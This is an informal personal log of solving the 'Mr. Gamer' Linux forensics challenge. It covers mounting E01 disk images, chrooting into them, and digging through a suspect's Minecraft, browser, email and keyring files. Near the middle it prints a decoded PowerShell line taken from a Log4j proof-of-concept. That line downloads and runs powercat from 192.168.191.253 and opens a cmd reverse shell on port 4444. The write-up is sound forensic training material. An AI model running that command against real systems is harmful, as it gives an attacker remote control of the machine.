cyber defenders challenge MR. GAMER (Linux forensics)

 (begun on 12 August 2022 finished on 15 September 2022)

warning: super informal, not professional, mostly unfiltered. apologies.)

for screenshots, visit https://github.com/dakshita-joshi/Cyber-Defenders-Challenge-Mr.-Gamer

install p7zip

unzip folder

install libewf ewf tools

research e01 expert witness file types, how to read, analyse, mount

make mount directory and try to mount

failed with permission denied

troubleshoot

parallely, download ftk imager and try it from cli

paraparallely install wine and try it from windows since a trial of the folder on windows showed binary stream and other encoded data(WINE SUCKS ASS)

meanwhile, since no other option remains except to enter sudo su root, so onward(disabling automount seems unwise, messing with root also seems unwise but hey)

install sleuthkit then /mnt/ewf/ewf1

mmls ewf1 and see partition table(un description partition that i cannot make sense of)

mkdir for e02 and continue same as yesterday to get an overview of the partitions

heres a lesson, always read up on theory first before blindly rushing into a challenge. was trying to mount the e01-8 files separately thinking they were all different disc images when i read that only the e01 file needs to be mounted and the rest are all pointed one after the other.so while reading up on theory and detail might seem boring and time consuming its v v imp because it saves time later when you are trying to execute the plan. 

so i had to create a logical mount partition. mounting without logical partition reslted in cannot find on etc/fstab error. si created logical mount point then calculated offset from mmls(512*whatever). then mounting w logical mount point resulted in cannot mount /dev/loop11 in ro mode. google search later, had to add norecovery flag after ro while mount -o.

mount -o ro,norecovery,loop,offset=537919488 /mnt/ewf/ewf1 /mntl 

cd /mntl

ls

now chroot

should i chroot? or should i explore sleuthkit?

chroot. sleuthkit in next attempt(i hate autopsy btw. all my homies hate autopsy)

chroot working. trying commands on my own pc terminal and then case terminal

right. wow. 

lsb_release -a gives version id of ubuntu

found metasploit meterpreter 

just going thru their files and folders. this is gossip girl but for tech

nano /etc/hostname for hostname (rshell -lenovo)

learnt that .bash_history is hidden because of . and ls -a releases all failes, even hidden. accessing .bash_history

will process that later and see what they got up to. in the meantime went to .minecraft and accessed usercache json file. got uuid of attacker. also from versions dir and then the json file version_manifest_v2.json got the sha1 hash of the latest version.

now that i think ab it. wasnt there some stuff about a minecraft player taking advantage of a log4j vulnerability etc etc. lemme read up on this gurl

next question ab the anime says little blue birdie so im assuming i need to explore the users twitter

ok so probs somewhere in the firefox history. 

cant find it. discord in the meantime. /home/rafael/.config/discord/0.0.16/modules# nano installed.json. all the installed modules version are there. the highest is discord_voice

yaa the anime thing >:( anyway the yt video was rick astley and the second video upload date i got from the channel 25 oct 2009

aight snap firefox shows some hope. current also has a symbolic link to 941. so ill travel to 941 and poke around from history

cache2 has all hex hashes of urls how do i figure out url from hashed value?!

roight anyway.found places.sqlite which is the mozilla history ive been told by stack overflow. so i need to find an sql data visualiser and then perhaps see more. im putting this on the burner for now and exploring other stuff that i dont need to go outside the terminal for. the location for easy access is /home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default. ill see if before common the firefox also has the mcr whatever file and so if it has the places.sql no there isnt anyway. 

yooo the little blue birdie might be thunderbird?? but its a mail service how can it have anime history ugh

the use watched a video question i answered from exploring their screenshots. i found the temperature in the ss too but its 12 of feb not 11? and found a hashes file that say guest which im assuming is for the guest wifi but its a hash not a passwd. 

hello i found linfo.org love itt. 

hello back at it again after a brief ctf break and guess what? i dont remember a damn thing i did and its only been a month yay whos surprised not me

right back in the game. now the questions.

the vpn service was zerotier. got it from var/lib

gnome keyring seems to be the way to password hashes and decrypting passwords. cant seem to figure out how to decipher tho. i can also see login history of guest user and posibly find sth from there since the password asked is from guest wifi. guest here means guest login session, right?

found screenshots in poc from marshalsec. binging with babish is the cookbook. also the screenshots for 11 feb 2022 shows 45 f but when i enter it says invalid. idk?? but atleast i can answer the cook book question. SPACE THE TEMPERATURE I DIDNT HAVE TO PUT SPACE BUT I DID AND UGH. the babish answer is babish culinary universe.

powercat answer is also seemingly in marshalsec. why didnt i pay more attention to it earlier? went on a trip to outer space and /var and /sbin and .cache and whatnot. anyway atleast i learned a lot. 

oh also i got frustrated and took the hint for guest wifi hint and it says check email. writing here so i remember.

okay FOUND INBOX IN /home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com. now to move it to my home folder so i can rename it to mbox extension and open it with thunderbird.

:( i mounted it as a read only file system and now it wont let me cp, mv or rename or anything i am so sad. do i remount it?

if (hear me out), i opened a connecion from this disk image to my computer and then transferred the image? can i open connections on a read only file system?

opened a terminal that wasnt in /mntl chroot, went to mntl thru normal terminal and copied it to my home file, then compared sizes to see if the files were copied aight. they were. 

sudo chmod it to be able to open. sudo chmod a+rwx. but for some reason my thunderbird isnt reading it?? tried a lot but ended up opening it in gedit and searching word wise. anime is Attack On Titan(rafael is a really basic sort of guy lol). guest wifi password was also here. many were, but first mean oldest so it was 093483

now the rce values that were passed to powercat, the mojang clienttoken and minecraft overlords or something. the client token and minecraft i can find around in the same folders or vicinities of folder so lets do that. first i gotta search what a client token and this overworld overlord thing even is. 

the clientoken is stored in the java keystore in etc/java/pki and then ill find it i guess. it would be java8 or java11? 

its stupid to go around wondering where anything is so i just go to mntl and search for keystore and then go the locations the path says. then ill figure out the stuff. 

"JAR=/usr/share/ca-certificates-java/ca-certificates-java.jar" found in jks-keystore. its a bash script that i think gives location for keystore? 

lmao no it doesnt. it does take me to the ca certificates file which i extract and go to keystore handler class so atleast im sure i need password to access the jks file which i believe is Matrix_1999. but where is this jks file??? do i need to make an authentication request to the mojang server with this key?

https://www.reddit.com/r/admincraft/comments/2ajrm2/how_joining_a_server_works/. trying information from this reddit post. first order of business is to check the lastlogin file, then use keytool to explore this user.keystore i found in /home/rafael/.local/share/keyrings. the 2 files are login.keyring and user.keystore. 

anyway found the values passed to powercat in /mntl/home/rafael/marshalsec/poc Log4jRCE.java. they were, as the hint suggested, base 64'ed. put in cyberchef, baked and got 

p.o.w.e.r.s.h.e.l.l. .-.c. .".I.E.X.(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.9.2...1.6.8...1.9.1...2.5.3.:.8.0.0.0./.p.o.w.e.r.c.a.t...p.s.1.'.).;.p.o.w.e.r.c.a.t. .-.c. .1.9.2...1.6.8...1.9.1...2.5.3. .-.p. .4.4.4.4. .-.e. .c.m.d."

the ans is  -c 192.168.191.253 -p 4444 -e cmd

the dimension answer is one because i went to new world from home/.minecraft and then saves and sow only DIM1 which i assumed meant one dimension so its one. i dont know what any of this means and i am not trying to know.

ohhhhh the keystore. what a load of trouble. i want to take up baking again. is this a sign from god?

anyway i tried cping the the user.keystore file from .local/share to my computer desktop and then i couldnt open and analyse it with keytool and it didnt work because first it could not find a java shared object file and then it couldnt recognise keystore because it was an invalid format. even opening it in in keysore analyser it could not recognise keystore type so im confused? the versions are all updated and correct. then i learnt that the keysring must be exported, not copied, and i can alternatively just recursively copy the whole .gnupg folder from his system to mine and it will bring all trust data and the keyrings. tried that too, but i think i dont know enough to really understand the intricacies of a linux system. every link i see seems to assume im already linus torvald so only half explains anything and i see other people understanding it too!! i feel like a first year med student trying to perform brain surgery. 

FINALLY. found something that exported their old keyring data to their new computers keyring. they only copied and didnt seem to have the problems i am having so i guess i can do that too? i must confess i did see the magnet forensics write up and they mounted the E01 files using a vm app and then simply booted into rafels disk with the given password and saw the cient token. guess what it cost money HA. never mind. i will try copying the keystore to mine and then opening it and if that doesnt work i guess ill simply write the answer from the writeup and pray to god to find money? idk. it seems unfair for money to give people an edge over others when all other information is accessible on the internet. but i guess im privileged too to even have internet. anyway this is not socialism o clock.

just for an experiment i tried to list my own keystore with keytool and it still says invalid format? im beginning to think this isnt a copying problem but really an update problem. ill try that avenue first an then copy rafaels keystore to mine. 

not womount --bind /proc /myroot/proc

rking. updated my java openjdk 11 then changed to oracle jdk 18. set it as default java and did not work. in rafael chroot it fails with libjli.so cannot open shared object. askubuntu says they encountereda similar problem in chroot and solved it by mount --bind /proc /myroot/proc. so what does it mean?? how come other write ups dont mention any of these problems??? are they so trivial that they dont deserve mentioning? anyway i did bind the chroot proc to my proc. apparently the proc is similar to mtab and gives list of mount points

I DID IT! I DID IT OH MY GOD JESUS CHRIST ALL I HAD TO DO WAS SHUT DOWN AND BOOT AGAIN GOD.

anyway what followed from the binding proc was that none of my java matters were solved. so i decided to try and unmount the image and then shut down and boot again. before that i noticed i had only copied the keystore and not rafaels keyring. the login on my password and keys was only for my system and not rafaels. so i copied both the keyring and the keystore and named them rafael.keyring etc. then i tried to unmount nd it wouldnt. so i did lsof and it showed seahorse aka the keyrings process. then i killed the process but it still showed a busy target so i screamed for a while and then remembered i had bound our procs in eternal marriage or whatever. so i unmount the proc, then i unmount mntl then ewf. then i rebooted the pc, saw passwords and keys, and saw second login, logged in with Matrix_1999 and sure enough, the client token was there and it is 2f76c8b04c004ddd888a05a6cad6be52. 

DONE!